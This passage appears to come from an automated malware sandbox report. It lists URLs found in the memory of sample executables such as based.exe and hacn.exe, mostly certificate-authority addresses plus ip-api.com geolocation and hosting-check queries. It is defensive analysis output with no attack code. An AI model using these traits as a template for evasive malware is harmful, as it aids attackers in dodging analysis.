Source: TS-240605-Millenium1.exe, 00000000.00000003.1833690751.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1833414858.000001C002F5F000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1830279591.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1829896804.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1833414858.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1831955754.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1832583214.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1830776920.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1829490121.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1830531474.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1871745230.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1868701636.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1870307360.0000024C988C2000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1880772946.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1867122240.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1881211961.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1868238836.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1870307360.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1868965314.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1869235010.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.1868737646.00000235B9F82000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: TS-240605-Millenium1.exe, 00000000.00000003.1833690751.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1830279591.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1829896804.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1833414858.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1831955754.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1832583214.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1830776920.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1829490121.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1830531474.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1871745230.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1868701636.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1870307360.0000024C988C2000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1880772946.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1867122240.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1881211961.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1868238836.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1870307360.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1868965314.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1869235010.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.1868737646.00000235B9F82000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.1876957083.00000235B9F83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: TS-240605-Millenium1.exe, 00000000.00000003.1833690751.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1830279591.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1829896804.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1833414858.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1831955754.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1832583214.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1830776920.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1829490121.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1830531474.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1871745230.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1868701636.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1880772946.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1867122240.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1881211961.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1868238836.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1870307360.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1868965314.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1869235010.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.1868737646.00000235B9F82000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.1876957083.00000235B9F83000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.1869510865.00000235B9F83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: TS-240605-Millenium1.exe, 00000000.00000003.1833690751.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1833414858.000001C002F5F000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1830279591.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1829896804.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1833414858.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1831955754.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1832583214.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1830776920.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1829490121.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1830531474.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1871745230.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1868701636.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1880772946.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1867122240.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1881211961.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1868238836.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1870307360.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1868965314.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1869235010.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.1868737646.00000235B9F82000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.1876957083.00000235B9F83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: based.exe, 00000007.00000002.2150147759.00000235B9F7E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.coz
Source: based.exe, 00000007.00000003.1877669650.00000235B9F83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: based.exe, 00000007.00000003.1877669650.00000235B9F83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: based.exe, 00000007.00000003.1877669650.00000235B9F83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: TS-240605-Millenium1.exe, 00000000.00000003.1833690751.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1833414858.000001C002F5F000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1830279591.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1829896804.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1833414858.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1831955754.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1832583214.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1830776920.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1829490121.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1830531474.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1871745230.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1868701636.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1870307360.0000024C988C2000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1880772946.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1867122240.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1881211961.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1868238836.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1870307360.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1868965314.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1869235010.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.1868737646.00000235B9F82000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: TS-240605-Millenium1.exe, 00000000.00000003.1833690751.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1830279591.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1829896804.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1833414858.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1831955754.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1832583214.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1830776920.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1829490121.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1830531474.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1871745230.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1868701636.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1870307360.0000024C988C2000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1880772946.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1867122240.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1881211961.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1868238836.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1870307360.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1868965314.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1869235010.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.1868737646.00000235B9F82000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.1876957083.00000235B9F83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: TS-240605-Millenium1.exe, 00000000.00000003.1833690751.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1830279591.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1829896804.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1833414858.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1831955754.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1832583214.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1830776920.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1829490121.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1830531474.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1871745230.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1868701636.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1880772946.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1867122240.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1881211961.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1868238836.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1870307360.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1868965314.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1869235010.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.1868737646.00000235B9F82000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.1876957083.00000235B9F83000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.1869510865.00000235B9F83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: svchost.exe, 00000016.00000003.1921986262.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.1926118860.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: TS-240605-Millenium1.exe, 00000000.00000003.1833690751.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1830279591.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1829896804.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1833414858.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1831955754.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1832583214.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1830776920.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1829490121.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1830531474.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1871745230.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1868701636.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1870307360.0000024C988C2000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1880772946.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1867122240.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1881211961.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1868238836.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1870307360.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1868965314.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1869235010.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.1868737646.00000235B9F82000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.1876957083.00000235B9F83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: s.exe, 0000000C.00000003.1905885998.000000000688D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000015.00000002.1999999146.0000025EB80B9000.00000004.00000800.00020000.00000000.sdmp, main.exe, 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
Source: based.exe, 00000007.00000003.1877669650.00000235B9F83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: based.exe, 00000008.00000002.2122205502.000001EB850C3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf);
Source: based.exe, 00000008.00000002.2123124196.000001EB87080000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://google.com/
Source: based.exe, 00000008.00000003.2119768607.000001EB8750D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2124170851.000001EB87518000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2121133626.000001EB87516000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2123442930.000001EB87201000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2121207876.000001EB871FF000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2120248212.000001EB8750E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://google.com/mail/
Source: based.exe, 00000008.00000002.2125738623.000001EB877C4000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2119154744.000001EB877C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
Source: main.exe, 00000015.00000002.1999999146.0000025EB7D34000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com
Source: main.exe, 00000015.00000002.1999999146.0000025EB7D21000.00000004.00000800.00020000.00000000.sdmp, main.exe, 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmp	String found in binary or memory: http://ip-api.com/json/
Source: based.exe, 00000008.00000002.2123594352.000001EB87280000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/json/?fields=225545
Source: based.exe, 00000008.00000003.1893866144.000001EB87185000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1894173592.000001EB87185000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1894354019.000001EB87177000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1894602665.000001EB871B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/json/?fields=225545r
Source: based.exe, 00000008.00000002.2123009852.000001EB86F80000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: based.exe, 00000008.00000003.1894173592.000001EB87185000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hostingr
Source: powershell.exe, 00000013.00000002.2043156118.0000022E65827000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: based.exe, 00000007.00000003.1877669650.00000235B9F83000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000002.2150147759.00000235B9F7E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: hacn.exe, 00000006.00000003.1868701636.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1870307360.0000024C988C2000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1880772946.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1867122240.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1881211961.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1868238836.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1870307360.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1868965314.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1869235010.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.1868737646.00000235B9F82000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.1876957083.00000235B9F83000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.1869510865.00000235B9F83000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.1869998239.00000235B9F83000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.1869793939.00000235B9F83000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.1878784619.00000235B9F83000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.1876198467.00000235B9F83000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.1868529039.00000235B9F82000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.1874550840.00000235B9F83000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.1870576706.00000235B9F83000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.1878484607.00000235B9F83000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.1870306176.00000235B9F83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: TS-240605-Millenium1.exe, 00000000.00000003.1833690751.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1833414858.000001C002F5F000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1830279591.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1829896804.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1833414858.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1831955754.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1832583214.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1830776920.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1829490121.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1830531474.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1871745230.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1868701636.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1880772946.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1867122240.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1881211961.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1868238836.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1870307360.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1868965314.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1869235010.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.1868737646.00000235B9F82000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.1876957083.00000235B9F83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: TS-240605-Millenium1.exe, 00000000.00000003.1833690751.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1833414858.000001C002F5F000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1830279591.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1829896804.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1833414858.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1831955754.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1832583214.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1830776920.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1829490121.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1830531474.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1871745230.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1868701636.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1870307360.0000024C988C2000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1880772946.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1867122240.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1881211961.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1868238836.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1870307360.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, 